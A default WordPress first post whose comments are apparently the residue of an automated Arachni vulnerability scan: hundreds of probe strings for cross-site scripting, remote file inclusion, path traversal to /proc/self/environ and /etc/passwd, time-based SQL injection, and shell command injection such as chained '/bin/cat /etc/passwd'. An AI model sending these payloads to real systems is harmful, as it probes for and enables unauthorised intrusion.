Welcome to WordPress. This is your first post. Edit or delete it, then start blogging!

420 Comments
  1. Hi, this is a comment.
    To delete a comment, just log in and view the post's comments. There you will have the option to edit or delete them.

  2. 1 arachni_xss_in_tag=3163bb5dc04647e802de72cfc31fa058 blah=

  3. 1

  4. 1′”

  5. 1http://tests.arachni-scanner.com/rfi.md5.txt

  6. tests.arachni-scanner.com/rfi.md5.txt

  7. 1

  8. 1%28%29%22%26%251%27-%3B%3Cxss_3163bb5dc04647e802de72cfc31fa058%2F%3E%27

  9. javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()

  10. “;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()”

  11. ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()

  12. 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()

  13. 1;
    window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()

  14. */;
    window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()/*

  15. 1#^($!@$)(()))******

  16. 1 ;arachni_xss_in_element_event=3163bb5dc04647e802de72cfc31fa058//

  17. 1 “;arachni_xss_in_element_event=3163bb5dc04647e802de72cfc31fa058//

  18. 1″‘`–

  19. php://input.

  20. /..//proc/self/environ.

  21. file:///..//proc/self/environ

  22. /../..//proc/self/environ

  23. /../../../..//proc/self/environ.

  24. file:///../../../..//proc/self/environ

  25. file:///../../../../../..//proc/self/environ.

  26. /../../../../../../..//proc/self/environ

  27. /../../../../../../../../..//proc/self/environ.

  28. file:///../../../../../../../../..//proc/self/environ

  29. file:///..//etc/passwd.

  30. /proc/self/environ.

  31. file:///proc/self/environ

  32. 1 and sleep(4)

  33. 1′ and sleep(4)=’

  34. 1

  35. 1′ where sleep(4) #

  36. 1;waitfor delay ‘0:0:4’–

  37. 1

  38. 1′));waitfor delay ‘0:0:4’–

  39. sleep(4000/1000);

  40. print 28763*4196403;

  41. /bin/cat /etc/passwd

  42. ” && /bin/cat /etc/passwd && “

  43. ` /bin/cat /etc/passwd`

  44. sleep 4

  45. ‘ & sleep 4 & ‘

  46. ” && sleep 4 && “

  47. ` sleep 4`

  48. 1′;.”)

  49. 1 arachni_xss_in_tag=57442fe26519f57510faa60527ce6ec6 blah=

  50. 1″ arachni_xss_in_tag=”57442fe26519f57510faa60527ce6ec6″ blah=”

  51. 1

  52. 1tests.arachni-scanner.com/rfi.md5.txt

  53. 1

  54. 1%28%29%22%26%251%27-%3B%3Cxss_57442fe26519f57510faa60527ce6ec6%2F%3E%27

  55. ‘;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()’//

  56. ‘,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:’

  57. 1

  58. 1

  59. php://input

  60. /..//proc/self/environ

  61. /../../..//proc/self/environ.

  62. file:///../../..//proc/self/environ

  63. /../../../..//proc/self/environ

  64. /../../../../../..//proc/self/environ.

  65. file:///../../../../../..//proc/self/environ

  66. file:///../../../../../../../..//proc/self/environ.

  67. /../../../../../../../../..//proc/self/environ

  68. file:///..//etc/passwd

  69. /proc/self/environ

  70. 1

  71. 1′ or sleep(4) #

  72. 1

  73. 1);waitfor delay ‘0:0:4’–

  74. ‘ && /bin/cat /etc/passwd && ‘

  75. 1

  76. | sleep 4 |

  77. ” & sleep 4 & “

  78. 1

  79. 1 arachni_xss_in_tag=9bbab1c00af22ee42b87bdd600bdfd20 blah=

  80. 1″ arachni_xss_in_tag=”9bbab1c00af22ee42b87bdd600bdfd20″ blah=”

  81. 1]]]]]]]]]

  82. 1

  83. 1

  84. 1%28%29%22%26%251%27-%3B%3Cxss_9bbab1c00af22ee42b87bdd600bdfd20%2F%3E%27

  85. javascript:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//

  86. “;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()”//

  87. ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//

  88. 1

  89. 1;
    window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//

  90. window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()

  91. 1 script:;arachni_xss_in_element_event=9bbab1c00af22ee42b87bdd600bdfd20//

  92. 1 script:”;arachni_xss_in_element_event=9bbab1c00af22ee42b87bdd600bdfd20//

  93. 1)

  94. file:///../..//proc/self/environ.

  95. /../../..//proc/self/environ

  96. file:///../../../../..//proc/self/environ.

  97. /../../../../../..//proc/self/environ

  98. /../../../../../../../..//proc/self/environ.

  99. file:///../../../../../../../..//proc/self/environ

  100. file:///etc/passwd.

  101. 1 or sleep(4) #

  102. 1″ or sleep(4) #

  103. 1′;waitfor delay ‘0:0:4’–

  104. 1));waitfor delay ‘0:0:4’–

  105. && /bin/cat /etc/passwd &&

  106. ‘ | /bin/cat /etc/passwd | ‘

  107. ” | /bin/cat /etc/passwd | “

  108. & sleep 4 &

  109. ‘ && sleep 4 && ‘

  110. 1 arachni_xss_in_tag=232fd5064bd482b3412fd1899fb43a7c blah=

  111. 1″ arachni_xss_in_tag=”232fd5064bd482b3412fd1899fb43a7c” blah=”

  112. 1

  113. 1

  114. 1%3C%2Ftextarea%3E–%3E%3Cxss_232fd5064bd482b3412fd1899fb43a7c%2F%3E%3C%21–%3Ctextarea%3E

  115. 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()//

  116. 1 script:;arachni_xss_in_element_event=232fd5064bd482b3412fd1899fb43a7c//

  117. 1 script:”;arachni_xss_in_element_event=232fd5064bd482b3412fd1899fb43a7c//

  118. 1

  119. /../..//proc/self/environ.

  120. file:///../..//proc/self/environ

  121. file:///../../../..//proc/self/environ.

  122. /../../../../..//proc/self/environ.

  123. file:///../../../../..//proc/self/environ

  124. file:///../../../../../../..//proc/self/environ.

  125. /../../../../../../../..//proc/self/environ

  126. /etc/passwd.

  127. file:///etc/passwd

  128. 1″ and sleep(4)=”

  129. 1

  130. 1′);waitfor delay ‘0:0:4’–

  131. 1 arachni_xss_in_tag=e4f3f5a2dac7e955d45b5a2774ae93e9 blah=

  132. 1″ arachni_xss_in_tag=”e4f3f5a2dac7e955d45b5a2774ae93e9″ blah=”

  133. 1<!–

  134. 1

  135. 1

  136. 1

  137. 1%3C%2Ftextarea%3E–%3E%3Cxss_e4f3f5a2dac7e955d45b5a2774ae93e9%2F%3E%3C%21–%3Ctextarea%3E

  138. ‘;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink()’

  139. “,x:window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink(),y:”

  140. 1 script:;arachni_xss_in_element_event=e4f3f5a2dac7e955d45b5a2774ae93e9//

  141. file:///..//proc/self/environ.

  142. file:///../../..//proc/self/environ.

  143. /../../../../..//proc/self/environ

  144. /../../../../../../..//proc/self/environ.

  145. file:///../../../../../../..//proc/self/environ

  146. file:///../../../../../../../../..//proc/self/environ.

  147. file:///proc/self/environ.

  148. /etc/passwd

  149. 1″=sleep(4)=”

  150. 1″;waitfor delay ‘0:0:4’–

  151. 1″));waitfor delay ‘0:0:4’–

  152. | /bin/cat /etc/passwd |

  153. && sleep 4 &&

  154. ‘ | sleep 4 | ‘

  155. ” | sleep 4 | “

  156. 1 arachni_xss_in_tag=ff081521458c78796b08f133e6028498 blah=

  157. 1″ arachni_xss_in_tag=”ff081521458c78796b08f133e6028498″ blah=”

  158. 1

  159. 1%28%29%22%26%251%27-%3B%3Cxss_ff081521458c78796b08f133e6028498%2F%3E%27

  160. 1 script:;arachni_xss_in_element_event=ff081521458c78796b08f133e6028498//

  161. 1

  162. 1′ and sleep(4) #

  163. 1’=sleep(4)=’

  164. 1″);waitfor delay ‘0:0:4’–

  165. 1 arachni_xss_in_tag=02ffded2a82942c8b02564991d3ca250 blah=

  166. 1″ arachni_xss_in_tag=”02ffded2a82942c8b02564991d3ca250″ blah=”

  167. 1

  168. 1%28%29%22%26%251%27-%3B%3Cxss_02ffded2a82942c8b02564991d3ca250%2F%3E%27

  169. ‘;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();’

  170. “;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();”

  171. ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();

  172. 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();

  173. 1;
    window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();

  174. 1 script:;arachni_xss_in_element_event=02ffded2a82942c8b02564991d3ca250//

  175. 1

  176. 1;select pg_sleep(4); —

  177. 1

  178. ;sleep(4000/1000);

  179. ;print 28763*4196403;

  180. ‘;print 28763*4196403;#

  181. ; /bin/cat /etc/passwd ;

  182. ‘ ; /bin/cat /etc/passwd ; ‘

  183. ” ; /bin/cat /etc/passwd ; “

  184. ; sleep 4 ;

  185. ‘ ; sleep 4 ; ‘

  186. ” ; sleep 4 ; “

  187. 1 arachni_xss_in_tag=f8ea58f90b1ed7a7339ceb84d93beae4 blah=

  188. 1″ arachni_xss_in_tag=”f8ea58f90b1ed7a7339ceb84d93beae4″ blah=”

  189. 1

  190. 1%28%29%22%26%251%27-%3B%3Cxss_f8ea58f90b1ed7a7339ceb84d93beae4%2F%3E%27

  191. 1%3C%2Ftextarea%3E–%3E%3Cxss_f8ea58f90b1ed7a7339ceb84d93beae4%2F%3E%3C%21–%3Ctextarea%3E

  192. 1 script:;arachni_xss_in_element_event=f8ea58f90b1ed7a7339ceb84d93beae4//

  193. 1

  194. 1′);select pg_sleep(4); —

  195. 1

  196. 1 arachni_xss_in_tag=c1e74d0e4b16205c64af151a98cb1fd5 blah=

  197. 1″ arachni_xss_in_tag=”c1e74d0e4b16205c64af151a98cb1fd5″ blah=”

  198. 1

  199. 1%28%29%22%26%251%27-%3B%3Cxss_c1e74d0e4b16205c64af151a98cb1fd5%2F%3E%27

  200. ‘;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();’//

  201. “;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();”//

  202. ;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//

  203. 1;window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//

  204. 1;
    window.top._arachni_js_namespace_taint_tracer.log_execution_flow_sink();//

  205. 1 script:;arachni_xss_in_element_event=c1e74d0e4b16205c64af151a98cb1fd5//

  206. 1 script:”;arachni_xss_in_element_event=c1e74d0e4b16205c64af151a98cb1fd5//

  207. 1′;select pg_sleep(4); —

  208. “;sleep(4000/1000);#

  209. “;print 28763*4196403;#

  210. 1 arachni_xss_in_tag=7c8475ca484ddb63a0ce2984f3801d61 blah=

  211. 1″ arachni_xss_in_tag=”7c8475ca484ddb63a0ce2984f3801d61″ blah=”

  212. 1

  213. 1%28%29%22%26%251%27-%3B%3Cxss_7c8475ca484ddb63a0ce2984f3801d61%2F%3E%27

  214. 1 script:;arachni_xss_in_element_event=7c8475ca484ddb63a0ce2984f3801d61//

  215. 1

  216. 1));select pg_sleep(4); —

  217. 1 arachni_xss_in_tag=84577da26cacef8c6c51071c40a500ab blah=

  218. 1″ arachni_xss_in_tag=”84577da26cacef8c6c51071c40a500ab” blah=”

  219. 1

  220. 1%28%29%22%26%251%27-%3B%3Cxss_84577da26cacef8c6c51071c40a500ab%2F%3E%27

  221. 1 script:;arachni_xss_in_element_event=84577da26cacef8c6c51071c40a500ab//

  222. 1 script:”;arachni_xss_in_element_event=84577da26cacef8c6c51071c40a500ab//

  223. 1 arachni_xss_in_tag=cca45dd35ec69fe883050fa0816aa94d blah=

  224. 1″ arachni_xss_in_tag=”cca45dd35ec69fe883050fa0816aa94d” blah=”

  225. 1

  226. 1

  227. 1%3C%2Ftextarea%3E–%3E%3Cxss_cca45dd35ec69fe883050fa0816aa94d%2F%3E%3C%21–%3Ctextarea%3E

  228. 1 script:;arachni_xss_in_element_event=cca45dd35ec69fe883050fa0816aa94d//

  229. 1);select pg_sleep(4); —

  230. 1 arachni_xss_in_tag=e4daa61bad0acafeafc401aefdebc143 blah=

  231. 1″ arachni_xss_in_tag=”e4daa61bad0acafeafc401aefdebc143″ blah=”

  232. 1

  233. 1–><!–

  234. 1 script:;arachni_xss_in_element_event=e4daa61bad0acafeafc401aefdebc143//

  235. 1 script:”;arachni_xss_in_element_event=e4daa61bad0acafeafc401aefdebc143//

  236. 1 script:’;arachni_xss_in_element_event=e4daa61bad0acafeafc401aefdebc143//

  237. 1 arachni_xss_in_tag=79eeee07bf0d3cf85f91650125efc84e blah=

  238. 1″ arachni_xss_in_tag=”79eeee07bf0d3cf85f91650125efc84e” blah=”

  239. 1

  240. 1()”&%1′-;’

  241. 1

  242. 1 script:;arachni_xss_in_element_event=79eeee07bf0d3cf85f91650125efc84e//

  243. 1 script:”;arachni_xss_in_element_event=79eeee07bf0d3cf85f91650125efc84e//

  244. 1 script:’;arachni_xss_in_element_event=79eeee07bf0d3cf85f91650125efc84e//

  245. 1 arachni_xss_in_tag=8789bb490316fc45e16f991848173b87 blah=

  246. 1″ arachni_xss_in_tag=”8789bb490316fc45e16f991848173b87″ blah=”

  247. 1

  248. 1

  249. 1

  250. 1 script:;arachni_xss_in_element_event=8789bb490316fc45e16f991848173b87//

  251. 1 script:”;arachni_xss_in_element_event=8789bb490316fc45e16f991848173b87//

  252. 1 script:’;arachni_xss_in_element_event=8789bb490316fc45e16f991848173b87//

  253. 1 arachni_xss_in_tag=c53da20edaadc7cb4460759479988b97 blah=

  254. 1″ arachni_xss_in_tag=”c53da20edaadc7cb4460759479988b97″ blah=”

  255. 1

  256. 1

  257. 1

  258. 1 script:;arachni_xss_in_element_event=c53da20edaadc7cb4460759479988b97//

  259. 1 script:”;arachni_xss_in_element_event=c53da20edaadc7cb4460759479988b97//

  260. 1 script:’;arachni_xss_in_element_event=c53da20edaadc7cb4460759479988b97//

Leave a Reply